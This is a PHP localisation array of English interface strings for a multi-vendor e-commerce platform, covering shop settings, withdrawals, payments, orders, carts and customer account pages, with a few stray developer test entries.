'Ex: 8+ Character' => 'Ex: 8+ Character', 'shop_information' => 'Shop information', 'Withdrawal_Method' => 'Withdrawal Method', 'Withdrawal_Methods' => 'Withdrawal Methods', 'withdraw_method_list' => 'Withdraw method list', 'Withdrawal_method_List' => 'Withdrawal method List', 'Add_method' => 'Add method', 'Add_fields' => 'Add fields', 'method_name' => 'Method name', 'Input Field Type' => 'Input Field Type', 'String' => 'String', 'field_name' => 'Field name', 'placeholder_text' => 'Placeholder text', 'This_field_required' => 'This field required', 'default_method' => 'Default method', 'Reset' => 'Reset', 'Reached maximum' => 'Reached maximum', 'ok' => 'Ok', 'Add_Fields' => 'Add Fields', 'methods' => 'Methods', 'account_name' => 'Account name', 'Placeholder' => 'Placeholder', 'Is Required' => 'Is Required', 'branch_name' => 'Branch name', 'want_to_update_status' => 'Want to update status', 'want_to_make_default_method' => 'Want to make default method', 'card_number' => 'Card number', 'card_type' => 'Card type', 'want_to_delete_this_method' => 'Want to delete this method', 'Default_Method_updated_successfully' => 'Default Method updated successfully', 'Default_Method_updated_failed.' => 'Default Method updated failed.', 'Method_name' => 'Method name', 'method_fields' => 'Method fields', 'active_status' => 'Active status', 'status_updated_failed.' => 'Status updated failed.', 'rtgr' => 'Rtgr', 'Once deleted you will not be able to recover this' => 'Once deleted you will not be able to recover this', 'Withdraw_Request' => 'Withdraw Request', 'Select_Withdraw_Method' => 'Select Withdraw Method', 'Total_Shop' => 'Total Shop', 'Cash_ Payments' => 'Cash Payments', 'Wallet_Payments' => 'Wallet Payments', 'shop_info' => 'Shop info', 'Edit_Shop_Info' => 'Edit Shop Info', 'By_turning_on_temporary_close_mode _your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers._they_cannot_purchase_or_place_order_from_your_shop' => 'By turning on temporary close mode your shop will be shown as temporary off in the website and app for the customers. they cannot purchase or place order from your shop', 'mtemporary_close' => 'Mtemporary close', 'temporary_close' => 'Temporary close', 'Vacation_Start' => 'Vacation Start', 'Vacation_End' => 'Vacation End', 'Vacation_Mode' => 'Vacation Mode', 'set_vacation_mode_for_shop_means_you_will_be_not_available_receive_order_and_provider_products_for_placed_order_at_that_time' => 'Set vacation mode for shop means you will be not available receive order and provider products for placed order at that time', 'Vacation_Note' => 'Vacation Note', 'pay by wallet' => 'Pay by wallet', 'temporary_close_inactive_successfully' => 'Temporary close inactive successfully', 'closed_for_now' => 'Closed for now', 'temporary_closed' => 'Temporary closed', 'this_shop_is_temporary_closed._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'This shop is temporary closed. You cannot add product to cart from this shop for now', 'PAYMENT_METHOD' => 'PAYMENT METHOD', 'published_key' => 'Published key', 'offline_payment' => 'Offline payment', 'Configure' => 'Configure', 'successfully_updated' => 'Successfully updated', 'Store_Client_ID' => 'Store Client ID', 'Store_Client_Secret_Key' => 'Store Client Secret Key', 'See_Credential_Setup_Instructions' => 'See Credential Setup Instructions', 'Now copy' => 'Now copy', 'payment_by' => 'Payment by', 'payment_note' => 'Payment note', 'transaction_ID' => 'Transaction ID', 'offline payment' => 'Offline payment', 'Payment_Note' => 'Payment Note', 'Payment_Details' => 'Payment Details', 'Shop_Name' => 'Shop Name', 'Shipping_Address' => 'Shipping Address', 'Billing_Address' => 'Billing Address', 'Contact_Number' => 'Contact Number', 'Order_Invoice' => 'Order Invoice', 'Total_Ordered_Product_Price' => 'Total Ordered Product Price', 'Total_Product_Discount' => 'Total Product Discount', 'Total_Coupon_Discount' => 'Total Coupon Discount', 'Total_Discounted_Amount' => 'Total Discounted Amount', 'Total_Delivery_Charge' => 'Total Delivery Charge', 'totals' => 'Totals', 'Admin_Discount' => 'Admin Discount', 'Seller_Discount' => 'Seller Discount', 'Admin_Commission' => 'Admin Commission', 'Admin_Net_Income' => 'Admin Net Income', 'Seller_Net_Income' => 'Seller Net Income', 'Social_Media_Chatting' => 'Social Media Chatting', 'Social-Media-Chatting' => 'Social-Media-Chatting', 'Social_Media_Chat' => 'Social Media Chat', 'messenger' => 'Messenger', 'paste_script' => 'Paste script', 'WhatsApp' => 'WhatsApp', 'whatsapp_phone_number' => 'Whatsapp phone number', 'Refund_Policy' => 'Refund Policy', 'Return_Policy' => 'Return Policy', 'Cancellation_Policy' => 'Cancellation Policy', 'return-policy' => 'Return-policy', 'refund-policy' => 'Refund-policy', 'cancellation-policy' => 'Cancellation-policy', 'public' => 'Public', 'go_to_vacation_mode' => 'Go to vacation mode', 'go_to_Vacation_Mode' => 'Go to Vacation Mode', 'close_now' => 'Close now', 'close_for_now' => 'Close for now', 'Shop_cover_Image' => 'Shop cover Image', 'offline_payments' => 'Offline payments', 'order_transactions' => 'Order transactions', 'Search_by_Order_ID_or_Transaction_ID' => 'Search by Order ID or Transaction ID', 'Total_Shop_Earnings' => 'Total Shop Earnings', 'Total_Product_Amount' => 'Total Product Amount', 'Product_Discount' => 'Product Discount', 'Discounted_Amount' => 'Discounted Amount', 'Delivery_Charge' => 'Delivery Charge', 'Order_Amount' => 'Order Amount', 'seller shipping' => 'Seller shipping', 'Weekly Delivery' => 'Weekly Delivery', 'Earning_From_Shipping' => 'Earning From Shipping', 'Total_Tax' => 'Total Tax', 'Seller_Wallet_Status' => 'Seller Wallet Status', 'Withdrawble_Balance' => 'Withdrawble Balance', 'Pending_Withdraws' => 'Pending Withdraws', 'Offline_Payments' => 'Offline Payments', 'Shipping_Charge' => 'Shipping Charge', 'Cash_Payment' => 'Cash Payment', 'Wallet' => 'Wallet', 'expense_Statistics' => 'Expense Statistics', 'Digital Product' => 'Digital Product', 'Digital Product on/off' => 'Digital Product on/off', 'Product_Brand' => 'Product Brand', 'Product Brand on/off' => 'Product Brand on/off', 'Order_Settings' => 'Order Settings', 'Show_Billing_Address_In_Checkout' => 'Show Billing Address In Checkout', 'refund_request_after_order_within' => 'Refund request after order within', 'cookie_setting' => 'Cookie setting', 'cookie_settings' => 'Cookie settings', 'delivery_zip_code_restriction_status_changed_successfully' => 'Delivery zip code restriction status changed successfully', 'delivery_country_restriction_status_changed_successfully' => 'Delivery country restriction status changed successfully', 'For single vendor operation deactive all seller!!' => 'For single vendor operation deactive all seller!!', 'Now your multi vendor business mode is opening you can add new seller !!' => 'Now your multi vendor business mode is opening you can add new seller !!', 'cookie_text' => 'Cookie text', 'thanks' => 'Thanks', 'i_Accept' => 'I Accept', 'Your_Privacy_Matter' => 'Your Privacy Matter', 'total_transaction' => 'Total transaction', 'Product_Statistics' => 'Product Statistics', 'Total_Expense_Amount' => 'Total Expense Amount', 'Free_Delivery_Amount' => 'Free Delivery Amount', 'Coupon_Discount_Amount' => 'Coupon Discount Amount', 'Transaction_Date' => 'Transaction Date', 'Expense_Type' => 'Expense Type', 'Expense_Amount' => 'Expense Amount', 'Total_Products' => 'Total Products', 'Soon_Stock_Out' => 'Soon Stock Out', 'Search_Method_Name' => 'Search Method Name', 'erfe' => 'Erfe', 'card_nummber' => 'Card nummber', 'master_card_number' => 'Master card number', 1000 => '1000', 'ac_number' => 'Ac number', 'status_update_failed.' => 'Status update failed.', 'payment_method_info' => 'Payment method info', 'if_thermal_printer_is_ready' => 'If thermal printer is ready', 'size' => 'Size', 'are_you_sure_change_this' => 'Are you sure change this', 'temporary_close_updated_successfully' => 'Temporary close updated successfully', 'tax_included' => 'Tax included', 'total_settled_amount' => 'Total settled amount', 'Total_Quantity_Sold' => 'Total Quantity Sold', 'open' => 'Open', 'Partner request' => 'Partner request', 'Chat_with_deliveryman' => 'Chat with deliveryman', 'Deliveryman_Review' => 'Deliveryman Review', 'pay_by_wallet' => 'Pay by wallet', 'If_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site _you' => 'If you require any assistance or have feedback or suggestions about our site you', 'can_email_us_at' => 'Can email us at', 'provide_a_WhatsApp_number_without_country_code' => 'Provide a WhatsApp number without country code', 'cccc' => 'Cccc', 'General_Info' => 'General Info', 'Meta_Title' => 'Meta Title', 'Meta_Description' => 'Meta Description', 'Meta_Image' => 'Meta Image', 'optional please provide embed link not direct link.' => 'Optional please provide embed link not direct link.', 'Once you have downloaded and filled the format file upload it in the form below and submit' => 'Once you have downloaded and filled the format file upload it in the form below and submit', 'You can get brand and category id from their list please input the right ids' => 'You can get brand and category id from their list please input the right ids', 'on_vacation_mode' => 'On vacation mode', 'on_vacation' => 'On vacation', 'On_Vacation' => 'On Vacation', 'this_shop_is_temporary_closed_or_on_vacation._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'This shop is temporary closed or on vacation. You cannot add product to cart from this shop for now', 'Sorry product out of stock' => 'Sorry product out of stock', 'product_Info' => 'Product Info', 'customer_Info' => 'Customer Info', 'Total_Amount' => 'Total Amount', 'Available_Color' => 'Available Color', 'Temporary_Closed' => 'Temporary Closed', 'This_shop_is_in_temporary_closed' => 'This shop is in temporary closed', 'This_shop_is_in_vacation_mode' => 'This shop is in vacation mode', 'note_from_seller' => 'Note from seller', 'this_count_is_the_summation_of' => 'This count is the summation of', 'returned_orders' => 'Returned orders', 'out_for_delivery_orders' => 'Out for delivery orders', 'this_count_is_the_summation_of_delivered_orders' => 'This count is the summation of delivered orders', 'the_ongoing_order_amount_will_be_shown_here' => 'The ongoing order amount will be shown here', 'after_the_order_is_delivered_total_order_amount_will_be_shown_here' => 'After the order is delivered total order amount will be shown here', 'product_wise_discounted_amount_will_be_shown_here' => 'Product wise discounted amount will be shown here', 'The_product_report_will_show_based_on_the_product_added_date' => 'The product report will show based on the product added date', 'free_delivery_coupon' => 'Free delivery coupon', 'coupon_discount_will_be_shown_here' => 'Coupon discount will be shown here', 'discount_on_purchase_and_first_delivery_coupon_amount_will_be_shown_here' => 'Discount on purchase and first delivery coupon amount will be shown here', 'subscription_date' => 'Subscription date', 'cancellation policy' => 'Cancellation policy', 'return policy' => 'Return policy', 'refund policy' => 'Refund policy', 'inhouse_shop' => 'Inhouse shop', 'product_settings' => 'Product settings', 'product_add' => 'Product add', 'this_module_will_run_for_updates_after_version_13.1' => 'This module will run for updates after version 13.1', 'expense_transaction' => 'Expense transaction', 'closed_now' => 'Closed now', 'theme_setup' => 'Theme setup', 'select_your_theme' => 'Select your theme', 'no_transaction_found' => 'No transaction found', 'issuer' => 'Issuer', 'identification_number' => 'Identification number', '50% Off On Black Friday For All Stores Valid Until 31 January 2023' => '50% Off On Black Friday For All Stores Valid Until 31 January 2023', 'Offers' => 'Offers', 'flash_deals_update' => 'Flash deals update', 'Error Something went wrong' => 'Error Something went wrong', 'Flash_Deal' => 'Flash Deal', 'stores' => 'Stores', 'All_Categories' => 'All Categories', 'Find_What_You_Need' => 'Find What You Need', 'Term_&_Conditions' => 'Term & Conditions', 'Accounts' => 'Accounts', 'Quick_Links' => 'Quick Links', 'Featured_Products' => 'Featured Products', 'Hotline' => 'Hotline', 'Become a Delivery Man' => 'Become a Delivery Man', 'Open Your Store' => 'Open Your Store', 'Help & Support' => 'Help & Support', 'Top Stores' => 'Top Stores', 'New Arrivals' => 'New Arrivals', 'customer_message' => 'Customer message', 'Customer_Name' => 'Customer Name', 'Message_View' => 'Message View', 'User_details' => 'User details', 'check' => 'Check', 'Message_Log' => 'Message Log', 'Abc' => 'Abc', 'already_check' => 'Already check', 'Become_a_Delivery_Man' => 'Become a Delivery Man', 'Open_Your_Store' => 'Open Your Store', 'Help_&_Support' => 'Help & Support', 'Top_Stores' => 'Top Stores', 'New_Arrivals' => 'New Arrivals', 'Free_Shipping' => 'Free Shipping', 'Free_Shipping_on_all_Order_Above_$560' => 'Free Shipping on all Order Above $560', 'Fresh_Product' => 'Fresh Product', '100%_Secure_Payment' => '100% Secure Payment', 'We_Ensure_Secure_Transactions' => 'We Ensure Secure Transactions', '24/7_Support_Center' => '24/7 Support Center', 'Privacy Policy' => 'Privacy Policy', 'Refund Policy' => 'Refund Policy', 'Return Policy' => 'Return Policy', 'Cancellation Policy' => 'Cancellation Policy', 'Generate Sitemap' => 'Generate Sitemap', 'Generate_Sitemap' => 'Generate Sitemap', 'Download Generate Sitemap' => 'Download Generate Sitemap', 'product tag' => 'Product tag', 'withdrawal methods' => 'Withdrawal methods', 'Become_a' => 'Become a', 'Search_for_items_or_store' => 'Search for items or store', 'Discounted_Products' => 'Discounted Products', 'Select_Category' => 'Select Category', 'login_to_your_account' => 'Login to your account', 'Don’t_have_account' => 'Don’t have account', 'Ex:_6+_character' => 'Ex: 6+ character', 'Forgot_Password' => 'Forgot Password', 'or_continue_with' => 'Or continue with', 'register' => 'Register', 'First_Name' => 'First Name', 'Last_Name' => 'Last Name', 'Confirm_Password' => 'Confirm Password', 'Sign_Up' => 'Sign Up', 'enter_email_or_phone_number' => 'Enter email or phone number', 'enter_phone_number' => 'Enter phone number', 'i_agree_with_the' => 'I agree with the', 'seller added successfully' => 'Seller added successfully', 'Hurry_up' => 'Hurry up', 'offer_ends_in' => 'Offer ends in', 'Select product' => 'Select product', 'profile' => 'Profile', 'Edit_Profile' => 'Edit Profile', 'Delete_My_Account' => 'Delete My Account', 'Edit_Personal_Details' => 'Edit Personal Details', 'Go_back' => 'Go back', 'Update_Profile' => 'Update Profile', 'Wish_List' => 'Wish List', 'Compare' => 'Compare', 'Loyalty_Point' => 'Loyalty Point', 'Personal_Details' => 'Personal Details', 'My_Addresses' => 'My Addresses', 'Add_Address' => 'Add Address', 'Home_(Shipping_Address)' => 'Home (Shipping Address)', 'banner' => 'Banner', 'banner_URL' => 'Banner URL', 'addresses' => 'Addresses', 'My profile' => 'My profile', 'Compare_List' => 'Compare List', 'Inbox' => 'Inbox', 'Contact Person Name' => 'Contact Person Name', 'Ex: 01xxxxxxxxx' => 'Ex: 01xxxxxxxxx', 'Ex: 6+ character' => 'Ex: 6+ character', 'Choose_Label' => 'Choose Label', 'Contact_Person' => 'Contact Person', 'Ex:_Jhon_Doe' => 'Ex: Jhon Doe', 'Ex:_01xxxxxxxxx' => 'Ex: 01xxxxxxxxx', 'Select_Country' => 'Select Country', 'Select_City' => 'Select City', 'Zip_Code' => 'Zip Code', 'Choose_Address_Type' => 'Choose Address Type', 'Ex:_1216_Dhaka' => 'Ex: 1216 Dhaka', 'Save_This_Address' => 'Save This Address', 'Ex:01xxxxxxxxx' => 'Ex:01xxxxxxxxx', 'Data_updated_successfully!' => 'Data updated successfully!', 'reschedule' => 'Reschedule', '+88' => '+88', '+99' => '+99', '+00' => '+00', '+11' => '+11', '+22' => '+22', 'office' => 'Office', 'home' => 'Home', 'My_Order_List' => 'My Order List', 'Show_Order :' => 'Show Order :', 'Old' => 'Old', 'items' => 'Items', 'Order_Summary' => 'Order Summary', 'Delivery_Man_Info' => 'Delivery Man Info', 'Track_Order' => 'Track Order', 'Product_Details' => 'Product Details', 'Unit_Price' => 'Unit Price', 'File type: jpg jpeg png. Maximum size: 2MB' => 'File type: jpg jpeg png. Maximum size: 2MB', 'Unit_Price_:' => 'Unit Price :', 'pc' => 'Pc', 'pc_' => 'Pc ', '_pc' => ' pc', 'Comment' => 'Comment', 'Attachment' => 'Attachment', 'Upload_File' => 'Upload File', 'File_type:_jpg_jpeg_png._Maximum_size:_2MB' => 'File type: jpg jpeg png. Maximum size: 2MB', 'Submit_a_review' => 'Submit a review', 'Refund_Request' => 'Refund Request', 'Refund_reason' => 'Refund reason', 'File_type:_jpg_jpeg_png._Maximum_size' => 'File type: jpg jpeg png. Maximum size', 'Coupon_discount' => 'Coupon discount', 'Total_refundable_amount' => 'Total refundable amount', 'transaction_history' => 'Transaction history', 'order place' => 'Order place', 'loyalty point' => 'Loyalty point', 'Chat_with_Seller' => 'Chat with Seller', 'Positive_Review' => 'Positive Review', 'Standard_Delivery' => 'Standard Delivery', 'Refund_Details' => 'Refund Details', 'employee_list' => 'Employee list', 'If sales commission is disabled here the system default commission will be applied' => 'If sales commission is disabled here the system default commission will be applied', 'If GST number is disabled here it will not show in invoice' => 'If GST number is disabled here it will not show in invoice', 'want_to_delete_this_address ' => 'Want to delete this address ', 'Write_something' => 'Write something', 'Write_something ' => 'Write something ', 'send_successfully' => 'Send successfully', 'Joined' => 'Joined', 'Show_Order_:' => 'Show Order :', 'Don t Delete' => 'Don t Delete', 'My_Wish_List' => 'My Wish List', 'Clear_All' => 'Clear All', 'Update_Deliveryman' => 'Update Deliveryman', 'General_Information' => 'General Information', 'New delivery-man' => 'New delivery-man', 'Last Name' => 'Last Name', 'Ex : DH-23434-LS' => 'Ex : DH-23434-LS', 'Account_Information' => 'Account Information', 'third_party_delivery_tracking_id' => 'Third party delivery tracking id', 'Submit_a_Deliveryman_Review' => 'Submit a Deliveryman Review', 'Chat_with_delivery' => 'Chat with delivery', 'Delivered_Orders' => 'Delivered Orders', 'Leave_a_comment' => 'Leave a comment', 'Chat_with_seller' => 'Chat with seller', 'Invalid review!' => 'Invalid review!', 'Product Successfully Returned' => 'Product Successfully Returned', 'assets/img/icons/track4.png' => 'Assets/img/icons/track4.png', 'assets/img/icons/track5.png' => 'Assets/img/icons/track5.png', 'Order_placed' => 'Order placed', 'Packaging_order' => 'Packaging order', 'Order_is_on_the_way' => 'Order is on the way', 'Preparing_for_shipment' => 'Preparing for shipment', 'Order_Delivered' => 'Order Delivered', 'Product_Successfully_Returned' => 'Product Successfully Returned', 'Sorry_we_can`t_complete_your_order' => 'Sorry we can`t complete your order', 'order_canceled' => 'Order canceled', 'order_Canceled' => 'Order Canceled', 'failedSorry_we_can`t_complete_your_order' => 'FailedSorry we can`t complete your order', 'failed!Sorry_we_can`t_complete_your_order' => 'Failed!Sorry we can`t complete your order', 'failed!_Sorry_we_can`t_complete_your_order' => 'Failed! Sorry we can`t complete your order', 'failed_!_Sorry_we_can`t_complete_your_order' => 'Failed ! Sorry we can`t complete your order', 'canceled._order_Canceled' => 'Canceled. order Canceled', 'order_returned._Product_Successfully_Returned' => 'Order returned. Product Successfully Returned', 'order_status_returned._Product_Successfully_Returned' => 'Order status returned. Product Successfully Returned', 'order_failed_!_Sorry_we_can`t_complete_your_order' => 'Order failed ! Sorry we can`t complete your order', 'add_to_wishlist' => 'Add to wishlist', 'add_to_compare' => 'Add to compare', 'quick_view' => 'Quick view', 'top' => 'Top', 'Seller_Login' => 'Seller Login', 'login_to_your_seller_account' => 'Login to your seller account', 'Ex:_8+_character' => 'Ex: 8+ character', 'Enter_captcha_value' => 'Enter captcha value', 'product_edit' => 'Product edit', 'USE_COUPON' => 'USE COUPON', 'Customeer_Added_Successfully' => 'Customeer Added Successfully', '${data.message}' => '${data.message}', 'View_All' => 'View All', 'Featured_Deals' => 'Featured Deals', 'Recommended_For_You' => 'Recommended For You', 'Best_Sellings' => 'Best Sellings', 'Latest_Products' => 'Latest Products', 'sorry' => 'Sorry', 'this_item_is_currently_sold_out' => 'This item is currently sold out', 'Header Banner' => 'Header Banner', 'Top_Rated_Products' => 'Top Rated Products', 'Don’t_Miss_the_Chance' => 'Don’t Miss the Chance', 'Today’s_Best_Deal' => 'Today’s Best Deal', 'Update Deal of The Day' => 'Update Deal of The Day', 'view_cart' => 'View cart', 'go_to_checkout' => 'Go to checkout', 'Login_successful' => 'Login successful', 'Item has been removed from cart ' => 'Item has been removed from cart ', 'in_Stock' => 'In Stock', 'cart_list' => 'Cart list', 'Cart_List' => 'Cart List', 'test product' => 'Test product', 'Vat' => 'Vat', 'FREE' => 'FREE', 'DELIVERY' => 'DELIVERY', 'add_to_Cart' => 'Add to Cart', 'details_Description' => 'Details Description', 'See_More' => 'See More', 'see_More' => 'See More', 'More_from_the_Store' => 'More from the Store', 'positive_review' => 'Positive review', 'Visit_Store' => 'Visit Store', 'similar_Products_From_Other_Stores' => 'Similar Products From Other Stores', 'Shopping_Details' => 'Shopping Details', 'empty_Cart' => 'Empty Cart', 'seller product test' => 'Seller product test', 'contact_With_Seller' => 'Contact With Seller', 'Type your message' => 'Type your message', 'sgred' => 'Sgred', 'variation wise product test' => 'Variation wise product test', 'seller variation wise product' => 'Seller variation wise product', 'Item_Price' => 'Item Price', 'Promo_Code' => 'Promo Code', 'Sub_total' => 'Sub total', 'free' => 'Free', 'Continue_Shopping' => 'Continue Shopping', 'Proceed_to_Next' => 'Proceed to Next', 'write_coupon_code_here' => 'Write coupon code here', 'Shopping_And_Billing_Details' => 'Shopping And Billing Details', 'Shipping_And_Billing_Details' => 'Shipping And Billing Details', 'Shipping_Details' => 'Shipping Details', 'cart' => 'Cart', 'Delivery_Information_Details' => 'Delivery Information Details', 'Delivery_Address' => 'Delivery Address', 'Save_this_Address' => 'Save this Address', 'Set_Form_Map' => 'Set Form Map', 'Select_From_Saved' => 'Select From Saved', 'Another_Address' => 'Another Address', 'Contact_Person_Name' => 'Contact Person Name', 'search_for_items_or_store' => 'Search for items or store', 'Same_as_Delivery_Address' => 'Same as Delivery Address', 'assets/img/svg/delete.svg' => 'Assets/img/svg/delete.svg', 'Fill_all_required_fields_of_shipping/billing_address' => 'Fill all required fields of shipping/billing address', 'Payment_Information' => 'Payment Information', 'pay_with_secure_Digital_payment_gateways' => 'Pay with secure Digital payment gateways', 'Cash_on_Delivery' => 'Cash on Delivery', 'Digital_Payment' => 'Digital Payment', 'offline' => 'Offline', 'Product already added to wishlist' => 'Product already added to wishlist', 'card_holder_name' => 'Card holder name', 'card_holder_email' => 'Card holder email', 'security_code' => 'Security code', 'installments' => 'Installments', 'configuration_invalid' => 'Configuration invalid', 'Your_Order_is_Completed' => 'Your Order is Completed', 'thank_you_for_your_order' => 'Thank you for your order', 'your_order_is_being_processed_and_will_be_completed_within_3-6_hours' => 'Your order is being processed and will be completed within 3-6 hours', 'you_will_receive_an_email_confirmation_when_your_order_is_completed' => 'You will receive an email confirmation when your order is completed', 'Final_Total' => 'Final Total', 'more' => 'More', 'Sorry' => 'Sorry', 'Out_of_stock' => 'Out of stock', 'order_again' => 'Order again', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product ' => 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product ', 'no_similar_products_found' => 'No similar products found', 'Order_Again' => 'Order Again', 'Want_to_order_your_usuals' => 'Want to order your usuals', 'Just_reorder_from_your_previous_orders' => 'Just reorder from your previous orders', 'Find' => 'Find', 'what_you_need' => 'What you need', 'more_stores' => 'More stores', 'Buy_Now' => 'Buy Now', 'just' => 'Just', 'for_you' => 'For you', 'search...' => 'Search...', 'start_a_new_message' => 'Start a new message', 'not_found_anything' => 'Not found anything', 'want_to_clear_all_wishlist ' => 'Want to clear all wishlist ', 'My_Wallet' => 'My Wallet', 'Total_Balance' => 'Total Balance', 'How_to_use' => 'How to use', 'Earn_money_to_your_wallet_by_completing_the_offer_&_challenged' => 'Earn money to your wallet by completing the offer & challenged', 'Convert_your_loyalty_points_into_wallet_money' => 'Convert your loyalty points into wallet money', 'Amin_also_reward_their_top_customers_with_wallet_money' => 'Amin also reward their top customers with wallet money', 'Send_your_wallet_money_while_order' => 'Send your wallet money while order', 'Transaction_History' => 'Transaction History', 'Debit' => 'Debit', 'Credit' => 'Credit', 'Total_Points' => 'Total Points', 'Convert_your_loyalty_point_to_wallet_money.' => 'Convert your loyalty point to wallet money.', 'Minimum_200_points_required_to_convert' => 'Minimum 200 points required to convert', 'into_currency' => 'Into currency', 'your_loyalty_point_will_convert_to_currency_and_transfer_to_your_wallet' => 'Your loyalty point will convert to currency and transfer to your wallet', 'minimum_point_for_convert_to_currency_is :' => 'Minimum point for convert to currency is :', 'create_a_support_tickets' => 'Create a support tickets', 'Close_ticket' => 'Close ticket', 'Leave_your_issue' => 'Leave your issue', 'Update_Address' => 'Update Address', 'Your_account_deleted_successfully!!' => 'Your account deleted successfully!!', 'Seller_Apply' => 'Seller Apply', 'Seller_Registration' => 'Seller Registration', 'Create_your_own_store.' => 'Create your own store.', 'Already_have_store ' => 'Already have store ', 'Open_your_and_start_selling.' => 'Open your and start selling.', 'Create_your_own_business' => 'Create your own business', 'Seller_Information' => 'Seller Information', ' Jhon' => ' Jhon', ' Doe' => ' Doe', 'Enter_email' => 'Enter email', 'Enter_phone_number' => 'Enter phone number', 'Enter_password' => 'Enter password', 'Image_Ration' => 'Image Ration', 'Image_size_must_be_within' => 'Image size must be within', 'Image_type_must_be_within' => 'Image type must be within', 'Store_Name' => 'Store Name', 'halar' => 'Halar', 'Store_Address' => 'Store Address', 'Road' => 'Road', 'Store_Banner' => 'Store Banner', 'Image_Ratio' => 'Image Ratio', 'Store_Logo' => 'Store Logo', 'I_agree_with_the' => 'I agree with the', 'Please_check_the_recaptcha' => 'Please check the recaptcha', 'color image' => 'Color image', 'various product' => 'Various product', 'Item_has_been_removed_from_cart' => 'Item has been removed from cart', 'color wise image' => 'Color wise image', 'added_to_cart_successfully!' => 'Added to cart successfully!', 'sub_category_Logo' => 'Sub category Logo', 'sub_category_list' => 'Sub category list', 'Category Logo' => 'Category Logo', 'all_items_were_not_added_to_cart_as_they_are_currently_unavailable_for_purchase!' => 'All items were not added to cart as they are currently unavailable for purchase!', 'Sidebar Banner' => 'Sidebar Banner', 'Followers' => 'Followers', 'Follow' => 'Follow', 'Quick_View' => 'Quick View', 'Search_Product' => 'Search Product', 'Search_for_items' => 'Search for items', 'Sort_by' => 'Sort by', 'High_to_Low_Price' => 'High to Low Price', 'Low_to_High_Price' => 'Low to High Price', 'A_to_Z_Order' => 'A to Z Order', 'Z_to_A_Order' => 'Z to A Order', 'Show_Product' => 'Show Product', 'Choose Option' => 'Choose Option', 'Best_Selling' => 'Best Selling', 'Top_Rated' => 'Top Rated', 'Most_Favorite' => 'Most Favorite', 'More_Categories' => 'More Categories', 'More_Brands' => 'More Brands', 'Ratings' => 'Ratings', 'Min' => 'Min', 'Max' => 'Max', 'Grid_View' => 'Grid View', 'List_View' => 'List View', 'Show_Filter_Options' => 'Show Filter Options', 'Follow_Complete' => 'Follow Complete', 'Unfollow' => 'Unfollow', 'Unfollow_Complete' => 'Unfollow Complete', 'follow' => 'Follow', 'View_style_updated' => 'View style updated', 'best selling' => 'Best selling', 'best-selling' => 'Best-selling', 'Go_To_Chatbox' => 'Go To Chatbox', 'My_Inbox' => 'My Inbox', 'No_featured_product_found' => 'No featured product found', 'No_Featured_Product_Found' => 'No Featured Product Found', 'Unfollow_now' => 'Unfollow now', 'top-rated' => 'Top-rated', 'most-favorite' => 'Most-favorite', 'shop_bottom_banner' => 'Shop bottom banner', 'Bottom' => 'Bottom', 'All_Stores' => 'All Stores', 'Store_Bottom_Banner' => 'Store Bottom Banner', 'pixel_analytics_your_pixel_id' => 'Pixel analytics your pixel id', 'pixel_analytics_your_pixel_id_from_facebook' => 'Pixel analytics your pixel id from facebook', 'google_tag_manager_id' => 'Google tag manager id', 'google_tag_manager_script_id_from_google' => 'Google tag manager script id from google', 'shop followers' => 'Shop followers', 'get_In' => 'Get In', 'touch' => 'Touch', 'call_us' => 'Call us', 'mail_us' => 'Mail us', 'Find_us' => 'Find us', 'type_here' => 'Type here', 'contact_number' => 'Contact number', 'short_title' => 'Short title', 'type_your_message_here..' => 'Type your message here..', 'flash_Deal_Products' => 'Flash Deal Products', 'Track_order' => 'Track order', 'Enter_your_order_ID_&_phone ' => 'Enter your order ID & phone ', 'to_get_delivery_updates' => 'To get delivery updates', 'My_Support_Tickets' => 'My Support Tickets', 'Want_to_unfollow_this_shop' => 'Want to unfollow this shop', 'Happy_Club' => 'Happy Club', 'collect_coupons_from_stores_and_apply_to_get_special_discount_from_stores' => 'Collect coupons from stores and apply to get special discount from stores', 'All_Shops' => 'All Shops', 'Don’t_Miss_Todays_Deal' => 'Don’t Miss Todays Deal', 'Let’s_Shopping_Today' => 'Let’s Shopping Today', 'Shop_Now' => 'Shop Now', 'LTR' => 'LTR', 'RTL' => 'RTL', 'light' => 'Light', 'dark' => 'Dark', 'My_Compare_List' => 'My Compare List', 'want_to_clear_all_compare_list ' => 'Want to clear all compare list ', 'Product_has_been_added_to_Compare_list' => 'Product has been added to Compare list', 'compare_list_Removed' => 'Compare list Removed', 'wishlist_Removed' => 'Wishlist Removed', 'My_Profile' => 'My Profile', 'seller test product 1' => 'Seller test product 1', 'test shipping' => 'Test shipping', 'neww seller product' => 'Neww seller product', 'similar_product_not_available' => 'Similar product not available', 'new product 2023' => 'New product 2023', 'customer_reviews' => 'Customer reviews', 'review_table' => 'Review table', 'Primary_Light_Color' => 'Primary Light Color', 'All_Brands_Page' => 'All Brands Page', 'all_brands' => 'All brands', 'show_brand :' => 'Show brand :', 'new_arrival' => 'New arrival', 'A-Z' => 'A-Z', 'Z-A' => 'Z-A', 'Sign_Out' => 'Sign Out', 'Seller_Reg' => 'Seller Reg', 'Sign_In' => 'Sign In', 'Enter_email_or_phone_number' => 'Enter email or phone number', 'Enjoy New experience' => 'Enjoy New experience', 'Captcha_Failed.' => 'Captcha Failed.', 'By_clicking_sign_up_you_are_agreed_with_our ' => 'By clicking sign up you are agreed with our ', 'Terms_&_Policy' => 'Terms & Policy', 'Have_an_Account' => 'Have an Account', 'View_All_cart_items' => 'View All cart items', 6 => '6', 'shop_secondary_banner' => 'Shop secondary banner', 'About_Company' => 'About Company', 'Days' => 'Days', 'hours' => 'Hours', 'minutes' => 'Minutes', 'seconds' => 'Seconds', 'See_All' => 'See All', 'In_Stock' => 'In Stock', 'Out_Of_Stock' => 'Out Of Stock', 'Recommended_for_You' => 'Recommended for You', 'Latest_Product' => 'Latest Product', 'Your_Most_Searching' => 'Your Most Searching', 'Top_Fashion_House' => 'Top Fashion House', 'Shop_Again_From_Your_Recent_Store' => 'Shop Again From Your Recent Store', 'Visit_Again' => 'Visit Again', 'Other s_Store' => 'Other s Store', 'Top_Rated_Seller' => 'Top Rated Seller', 'New_Seller' => 'New Seller', 'Visit_Shop' => 'Visit Shop', 'enter_email_address' => 'Enter email address', 'Live_Chat' => 'Live Chat', 'Profile_Info' => 'Profile Info', 